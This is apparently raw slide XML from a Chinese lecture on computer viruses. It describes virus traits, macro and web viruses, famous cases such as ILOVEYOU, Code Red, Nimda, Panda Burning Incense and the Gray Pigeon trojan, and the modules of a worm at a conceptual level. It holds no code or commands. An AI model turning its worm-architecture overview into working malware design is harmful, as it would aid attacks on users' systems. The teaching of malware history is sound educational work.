              </a:rPr>
              <a:t>网页病毒也是由脚本编写而成，不过大部分网页病毒并不像脚本病毒那样具有传染性，网页病毒没有传染性，只是放在互联网上被动的接受用户的访问。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>结合多种互联网病毒特性的混和型病毒将成为互联网病毒的主流，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>混和型病毒是互联网病毒的发展趋势。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>随着计算机网络的发展和普及，越来越多的病毒都是透过网络传播，并最终对整个网络造成危害。其中具有代表性的有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>尼姆达</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>红色代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>冲击波</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等病毒，这些病毒都给互联网造成过巨大的影响。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>任何新的计算机技术的出现，利用这种新技术编写的病毒很快就会产生，而随之的对抗技术也会产生。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>只要计算机还存在、还在不断发展，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>计算机病毒和反病毒的技术这一正一反的两种技术的斗争就永远不会结束。</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2000年5月4日，一种名为“我爱你”的电脑病毒开始在全球各地迅速传播，短短的一两天内就侵袭了100多万台计算机 [2]  。这个病毒是通过Microsoft Outlook电子邮件系统传播的，邮件的主题为“I LOVE YOU”，并包含一个附件。一旦在Microsoft Outlook里打开这个邮件，系统就会自动复制并向地址簿中的所有邮件电址发送这个病毒。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>红色病毒首先被eEye Digital Security公司的雇员Marc Maiffret和Ryan Permeh发现并研究。他们将其命名为“Code Red”，因为他们当时在喝</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>Code Red Mountain Dew</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熊猫烧香”，是由李俊制作并肆虐网络的一款电脑病毒，熊猫烧香跟灰鸽子不同，是一款拥有自动传播、自动感染硬盘能力和强大的破坏能力的病毒，它不但能感染系统中exe，com，pif，src，html，asp等文件，它还能终止大量的反病毒软件进程并且会删除扩展名为gho的文件（该类文件是一系统备份工具“GHOST”的备份文件，删除后会使用户的系统备份文件丢失。）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>https://baike.baidu.com/item/%E6%9D%8E%E4%BF%8A/3035801?fr=aladdin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https://blog.csdn.net/weixin_44944722/article/details/95620977?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-5.channel_param&amp;depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-5.channel_param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https://blog.csdn.net/weixin_44944722/article/details/95620977?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-5.channel_param&amp;depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-5.channel_param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http://www.bala.cc/jiaoyu/zhuanye/2018/967.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>宏病毒（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Macro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：寄存在文档或模板的宏中的计算机病毒，一旦被执行，就转移到计算机上，并驻留在Normal模板上，导致文件删除、修改、传输泄露等。</a:t>
            </a:r>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http://www.bala.cc/jiaoyu/zhuanye/2018/967.</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繁殖性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>计算机病毒可以像生物病毒一样进行繁殖，当正常程序运行的时候，它也进行运行自身复制，是否具有繁殖、感染的特征是判断某段程序为计算机病毒的首要条件。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>破坏性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>计算机中毒后，可能会导致正常的程序无法运行，把计算机内的文件删除或受到不同程度的损坏。通常表现为：增、删、改、移。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>传染性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>计算机病毒不但本身具有破坏性，更有害的是具有传染性，一旦病毒被复制或产生变种，其速度之快令人难以预防。传染性是病毒的基本特征。在生物界，病毒通过传染从一个生物体扩散到另一个生物体。在适当的条件下，它可得到大量繁殖，并使被感染的生物体表现出病症甚至死亡。同样，计算机病毒也会通过各种渠道从已被感染的计算机扩散到未被感染的计算机，在某些情况下造成被感染的计算机工作失常甚至瘫痪。与生物病毒不同的是，计算机病毒是一段人为编制的计算机程序代码，这段程序代码一旦进入计算机并得以执行，它就会搜寻其他符合其传染条件的程序或存储介质，确定目标后再将自身代码插入其中，达到自我繁殖的目的。只要一台计算机染毒，如不及时处理，那么病毒会在这台电脑上迅速扩散，计算机病毒可通过各种可能的渠道，如软盘、硬盘、移动硬盘、计算机网络去传染其他的计算机。当您在一台机器上发现了病毒时，往往曾在这台计算机上用过的软盘已感染上了病毒，而与这台机器相联网的其他计算机也许也被该病毒染上了。是否具有传染性是判别一个程序是否为计算机病毒的最重要条件。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>潜伏性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>有些病毒像定时炸弹一样，让它什么时间发作是预先设计好的。比如黑色星期五病毒，不到预定时间一点都觉察不出来，等到条件具备的时候一下子就爆炸开来，对系统进行破坏。一个编制精巧的计算机病毒程序，进入系统之后一般不会马上发作，因此病毒可以静静地躲在磁盘或磁带里呆上几天，甚至几年，一旦时机成熟，得到运行机会，就又要四处繁殖、扩散，继续危害。潜伏性的第二种表现是指，计算机病毒的内部往往有一种触发机制，不满足触发条件时，计算机病毒除了传染外不做什么破坏。触发条件一旦得到满足，有的在屏幕上显示信息、图形或特殊标识，有的则执行破坏系统的操作，如格式化磁盘、删除磁盘文件、对数据文件做加密、封锁键盘以及使系统死锁等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>隐蔽性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>计算机病毒具有很强的隐蔽性，有的可以通过病毒软件检查出来，有的根本就查不出来，有的时隐时现、变化无常，这类病毒处理起来通常很困难。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可触发性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>病毒因某个事件或数值的出现，诱使病毒实施感染或进行攻击的特性称为可触发性。为了隐蔽自己，病毒必须潜伏，少做动作。如果完全不动，一直潜伏的话，病毒既不能感染也不能进行破坏，便失去了杀伤力。病毒既要隐蔽又要维持杀伤力，它必须具有可触发性。病毒的触发机制就是用来控制感染和破坏动作的频率的。病毒具有预定的触发条件，这些条件可能是时间、日期、文件类型或某些特定数据等。病毒运行时，触发机制检查预定条件是否满足，如果满足，启动感染或破坏动作，使病毒进行感染或攻击；如果不满足，使病毒继续潜伏。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>破坏性编辑</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>指病毒破坏系统,修改或删除数据,占用系统资源,干扰机器的正常运行,严重的会使计算机系统全面崩溃.</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http://www.bala.cc/jiaoyu/zhuanye/2018/967.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>http://www.oushinet.com/europe/other/20170515/262581.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>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http://www.bala.cc/jiaoyu/zhuanye/2018/967.</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目前正以10比特币(20万美元)的价格出售，并且还上传了75万条的样本数据来证明其真实性。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>http://cache.baiducontent.com/c?m=KcXre7HfCoa4iuBMNHZr3kb5zYeqEBqCXxtdgxHzAD2FPQ5wN3wYRVkPqRO5lR9w78ysZRsgXkNcdfzAGxK6eH80q4QGip96KzEGtOZ04Ye&amp;p=8677c3568b934eac52a7c7710f7a&amp;newp=ce63c716d9c11cff57ee9e12540a92695c02dc3051d0d401298ffe0cc4241a1a1a3aecbb24241502d9c478610abb0f31aba7747d605f76ea&amp;s=cfcd208495d565ef&amp;user=baidu&amp;fm=sc&amp;query=%C9%CF%BA%A3+%CA%FD%BE%DD%D0%B9%C2%B6&amp;qid=b9a8cfa00003d24c&amp;p1=1</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http://www.enet.com.cn/article/2007/0720/A20070720734467.shtml</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>灰鸽子（ Huigezi），原本该软件适用于公司和家庭管理，其功能十分强大，不但能监视摄像头、键盘记录、监控桌面、文件操作等。还可以运行后自删除、毫无提示安装等，因早年采用反弹链接这种缺陷设计，使得使用者拥有最高权限，一经破解即无法控制。最终导致被黑客恶意使用。原作者的灰鸽子被误认为 [1]  是一款集多种控制方式于一体的木马程序。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>自2001年，灰鸽子诞生之日起，就被反病毒专业人士判定为最具危险性的后门程序，并引发了安全领域的高</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>度关注。2004年、2005年、2006年，灰鸽子木马连续三年被国内各大杀毒厂商评选为年度十大病毒，灰鸽子也因此声名大噪，逐步成为媒体以及网民关注的焦点。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>“灰鸽子”是2001年出现的，采用Delphi编写，最早并未以成品方式发布，更多的是以技术研究的姿态，采用了源码共享的方式出现在互联网，至今仍可搜索到“灰鸽子”早期版本的源码。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>004和2005这两年之间，灰鸽子逐步进入了成熟的状态，由于源码的释放，大量变种在互联网中衍生。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>灰鸽子产业链示意图</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>灰鸽子产业链示意图</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2004年灰鸽子总共发现了1000多变种，而在2005年，这个数字迅速上升到了3000多。“灰鸽子”最大的危害在于潜伏在用户系统中，由于其使用的“反弹端口”原理，一些在局域网（企业网）中的用户也受到了“灰鸽子”的侵害，使得受害用户数大大提高，2004年的感染统计表现为103483人，而到2005年数字攀升到890321人。“灰鸽子”本身所具备的键盘记录、屏幕捕捉、文件上传下载和运行、摄像头控制等功能，将使用户没任何隐私可言，更可怕的是服务端高度隐藏自己，使受害者无从得知感染此病毒。 [4]</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buNone/>
            </a:pP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掌握一些病毒的命名规则，我们就能通过杀毒软件的报告中出现的病毒名来判断该病毒的一些共有的特性了</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http://www.bala.cc/jiaoyu/zhuanye/2018/967.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>自我繁殖 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用软件漏洞 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>造成网络拥塞 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>消耗系统资源 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>留下安全隐患 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>尼姆达病毒是典型的蠕虫病毒，病毒由Java脚本语言编写，以邮件、主动攻击服务器、即时通讯工具、FTP协议、网页浏览传播，传播性极强，和传统的邮件传播病毒不同，尼姆达不需要拆开或运行这个附件病毒就被执行。由于该病毒在自身传染的过程中占用大量的网络带宽和计算机的内部资源，因此许多企业的网络受到很大的影响，甚至瘫痪，个人PC机速度也会有明显的下降。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>相比之下，红色代码更厉害，它是蠕虫病毒和木马的完美结合体，简直是划时代性的病毒，一旦中了红色代码，黑客能轻易取得你计算机管理员权限并为所欲为，利用木马程序盗走机密数据，严重威胁网络安全，非常致命。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>当然说到木马程序，2001年还诞生了一款非常厉害的程序，那就是“灰鸽子”，当年被认为是最具危险性的后门程序，除了能监视摄像头、键盘记录、监控桌面、文件操作等基本的远控功能之外还有黑客专用功能，如：伪装系统图标、随意更换启动项名称和表述、随意更换端口、运行后自删除、毫无提示安装等，并采用反弹链接这种缺陷设计，使得使用者拥有最高权限。灰鸽子前身是一款企业内部监测远控产品，这块软件至今能在网上找到源码，多年入选年度十大病毒，流行时间长达十多年。</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eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>搜索模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：寻找下一台要传染的计算机；为了提高搜索效率，可以采用一系列的搜索算法。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：在被感染的计算机上建立传输通道（传染途径）；为减少第一次传染数据传输量，可以采用引导式结构。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>传输模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：计算机间的蠕虫程序复制。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>信息搜索模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：搜索和建立被传染计算机上的信息。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>繁殖模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：建立自身的多个副本；在同一台计算机上提高传染效率、判断避免重复传染</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>隐藏模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：隐藏蠕虫程序，使简单的检测不能发现。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>破坏模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：摧毁或破坏被感染计算机，或在被感染的计算机上留下后门程序等。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通信模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：蠕虫间、蠕虫同黑客之间进行交流，可能是未来蠕虫发展的侧重点。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>控制模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：调整蠕虫行为，更新其他功能模块，控制被感染计算机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可能是未来蠕虫发展的侧重点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>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http://www.bala.cc/jiaoyu/zhuanye/2018/967.</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zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>蠕虫程序的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>工作流程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以分为漏洞扫描、攻击、传染、现场处理四个阶段</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>首先，蠕虫进行漏洞扫描，扫描到存在的漏洞后，就将蠕虫主体移到目标主机中，实施攻击；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
